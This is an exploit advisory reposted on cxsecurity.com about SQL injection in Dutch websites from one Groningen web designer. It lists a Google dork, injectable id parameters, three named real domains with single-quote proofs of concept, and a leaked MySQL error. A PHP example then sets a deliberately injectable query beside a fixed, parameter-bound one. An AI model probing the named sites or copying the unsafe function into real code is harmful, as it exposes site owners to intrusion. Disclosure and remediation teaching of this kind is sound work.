Site Specken.NL + Starque.Com Groningen Web Design Netherlands SQL Injection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################

# Exploit Title : Site Specken.NL + Starque.Com Groningen Web Design Netherlands SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepages : Specken.NL ~ Starque.Com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork : intext:''SITE: SPECKEN.NL + STARQUE.COM''

# SQL Injection Exploits :

/events.php?id=[SQL Injection]
/nieuwsitem.php?id=[SQL Injection]
/morogroningen/evenement.php?id=[SQL Injection]
/morogroningen/arrangement.php?id=[SQL Injection]
/cervantesgroningen/fotoalbum.php?id=[SQL Injection]
/cervantesgroningen/menukaart.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

hemingwaygroningen.nl/events.php?id=280%27 => [ Proof of Concept ] => archive.is/SqjkF
bennergroep.nl/morogroningen/evenement.php?id=134%27 => [ Proof of Concept ] => archive.is/2O9Yv
viaromanica.nl/morogroningen/evenement.php?id=136%27 => [ Proof of Concept ] => archive.is/1tLTs

# SQL Database Error =>

Zoekvraag kon niet uitgevoerd worden:
errorno=1064
error=You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''280''' at line 4
query=select e.evenement_id, e.geactiveerd, e.titel, e.subtitel, e.afbeelding_id, e.producent_id, date_format (e.datum,'%d-%m-%Y') , e.aanvang, e.zaalopen, e.status_id, e.entreedeur, e.entreevvk, e.soort_id, e.link, e.wekelijks, e.tekst, date_format(e.lioc_datum,'%d-%m-%Y') ,date_format(e.lioc_datum,'%H:%i'), e.lioc_user, e.altdatum ,e.afbeeldinglinks_id , r.website , DATEDIFF(e.datum,CURDATE())from evenementen e, restaurants r where e.restaurant_id = r.restaurant_id and e.evenement_id = '280''

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
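
The leaked query shows the id parameter pasted between quotes (e.evenement_id = '280''), and the page echoes the database error back to the visitor. As an added example, not code from the affected sites or from the advisory author, this PHP code puts that pattern beside a validated, bound lookup that keeps error detail in the server log. Assumptions: the function names are hypothetical, the table is cut down to two columns from the leaked query with one constructed row, and in-memory SQLite (needs pdo_sqlite) stands in for the MySQL backend.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the evenementen table; column names come from the
// leaked query, the row itself is made up. SQLite replaces MySQL here.
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE evenementen (evenement_id INTEGER PRIMARY KEY, titel TEXT)');
    $pdo->exec("INSERT INTO evenementen VALUES (280, 'Constructed sample event')");
    return $pdo;
}

// Before: the id is pasted between quotes, so id=280' changes the SQL text.
function findEventUnsafe(PDO $pdo, string $id): ?array
{
    $sql = "SELECT evenement_id, titel FROM evenementen WHERE evenement_id = '$id'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// After: reject anything that is not a positive integer, then bind it.
function findEventSafe(PDO $pdo, string $id): ?array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return null;                       // caller answers 404, no SQL runs
    }
    $stmt = $pdo->prepare('SELECT evenement_id, titel FROM evenementen WHERE evenement_id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

$pdo = demoDb();
foreach (['280', "280'"] as $id) {
    try {
        $unsafe = findEventUnsafe($pdo, $id) ? 'row' : 'no row';
    } catch (PDOException $e) {
        error_log($e->getMessage());       // detail goes to the server log only
        $unsafe = 'query failed (generic error shown to the client)';
    }
    $safe = findEventSafe($pdo, $id) ? 'row' : 'not found';
    printf("id=%-5s unsafe: %s | safe: %s\n", $id, $unsafe, $safe);
}
```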

References:

https://www.cyberizm.org/cyberizm-site-specken-starque-groningen-web-design-sql-inj.html



Copyright 2018, cxsecurity.com

 
